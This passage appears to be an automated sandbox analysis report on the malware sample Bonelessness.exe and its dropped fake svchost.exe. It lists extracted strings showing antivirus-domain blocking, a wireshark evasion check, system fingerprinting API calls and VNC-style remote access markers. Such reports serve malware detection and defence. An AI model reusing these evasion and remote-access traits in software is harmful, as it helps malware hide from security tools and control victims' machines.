      Source: Bonelessness.exe, Bonelessness.exe, 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, Bonelessness.exe, 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: JbrLYfXaOpqnSngA.exe, 00000005.00000000.2010287647.0000000001481000.00000002.00000001.00040000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000006.00000000.2011041411.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000008.00000000.2012886710.0000000001711000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: Bonelessness.exe, 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, Bonelessness.exe, 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comkltest.org.rutrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comkltest.org.rutrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%s!verifMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3T2data.txt\*.*...\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xexplorer.exeShell_TrayWnd
      Source: JbrLYfXaOpqnSngA.exe, 00000005.00000000.2010287647.0000000001481000.00000002.00000001.00040000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000006.00000000.2011041411.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000008.00000000.2012886710.0000000001711000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: JbrLYfXaOpqnSngA.exe, 00000005.00000000.2010287647.0000000001481000.00000002.00000001.00040000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000006.00000000.2011041411.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000008.00000000.2012886710.0000000001711000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00413DA0 cpuid 0_2_00413DA0
      Source: C:\Windows\apppatch\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Bonelessness.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00402340 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,0_2_00402340
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00403920 GetModuleFileNameA,GetModuleFileNameA,strstr,strstr,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403920
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D248C0 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle,1_2_02D248C0
      Source: C:\Users\user\Desktop\Bonelessness.exeCode function: 0_2_00403310 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,0_2_00403310
      Source: Bonelessness.exe, Bonelessness.exe, 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, Bonelessness.exe, 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911583731.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2912354659.0000000002D83000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, svchost.exe, 00000001.00000002.2911583731.0000000002515000.00000040.00001000.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: wireshark.exe

      Remote Access Functionality

      barindex
      Source: Bonelessness.exeString found in binary or memory: RFB 003.006
      Source: Bonelessness.exe, 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: Bonelessness.exe, 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: Bonelessness.exe, 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: RFB 003.006
      Source: Bonelessness.exe, 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: $BRFB 003.006
      Source: svchost.exeString found in binary or memory: RFB 003.006
      Source: svchost.exeString found in binary or memory: RFB 003.006
      Source: svchost.exe, 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: svchost.exe, 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: svchost.exe, 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: svchost.exe, 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: svchost.exe, 00000001.00000002.2911583731.00000000024C0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: svchost.exe, 00000001.00000002.2911583731.00000000024C0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: svchost.exe, 00000001.00000002.2912354659.0000000002D83000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: svchost.exe, 00000001.00000002.2912354659.0000000002D83000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: svchost.exe, 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: svchost.exe, 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: svchost.exe, 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: RFB 003.006
      Source: svchost.exe, 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: $BRFB 003.006
      Source: svchost.exe, 00000001.00000002.2911583731.0000000002515000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: svchost.exe, 00000001.00000002.2911583731.0000000002515000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exeString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exeString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000005.00000002.2204891369.0000000002890000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000005.00000002.2204891369.0000000002890000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000005.00000002.2204103743.0000000000E40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000005.00000002.2204103743.0000000000E40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exeString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exeString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000006.00000002.2205687286.0000000002440000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000006.00000002.2205687286.0000000002440000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000006.00000002.2204387165.0000000000D50000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000006.00000002.2204387165.0000000000D50000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exeString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exeString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000017.00000002.2056609084.0000000000C40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000017.00000002.2056609084.0000000000C40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000017.00000002.2056409914.0000000000B90000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000017.00000002.2056409914.0000000000B90000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000019.00000002.2061047580.0000000002AB0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000019.00000002.2061047580.0000000002AB0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000019.00000002.2060118057.0000000001020000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000019.00000002.2060118057.0000000001020000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000001B.00000002.2072516404.00000000024E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000001B.00000002.2072516404.00000000024E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000001B.00000002.2072302801.0000000002340000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000001B.00000002.2072302801.0000000002340000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000001D.00000002.2073597993.00000000032C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000001D.00000002.2073597993.00000000032C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000001D.00000002.2072822053.0000000003010000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000001D.00000002.2072822053.0000000003010000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000001F.00000002.2078765056.00000000008B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000001F.00000002.2078765056.00000000008B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000001F.00000002.2078570583.0000000000850000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 0000001F.00000002.2078570583.0000000000850000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000021.00000002.2080968370.0000000002B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000021.00000002.2080968370.0000000002B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000021.00000002.2080530935.0000000002960000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000021.00000002.2080530935.0000000002960000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000023.00000002.2083592694.0000000002E90000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000023.00000002.2083592694.0000000002E90000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
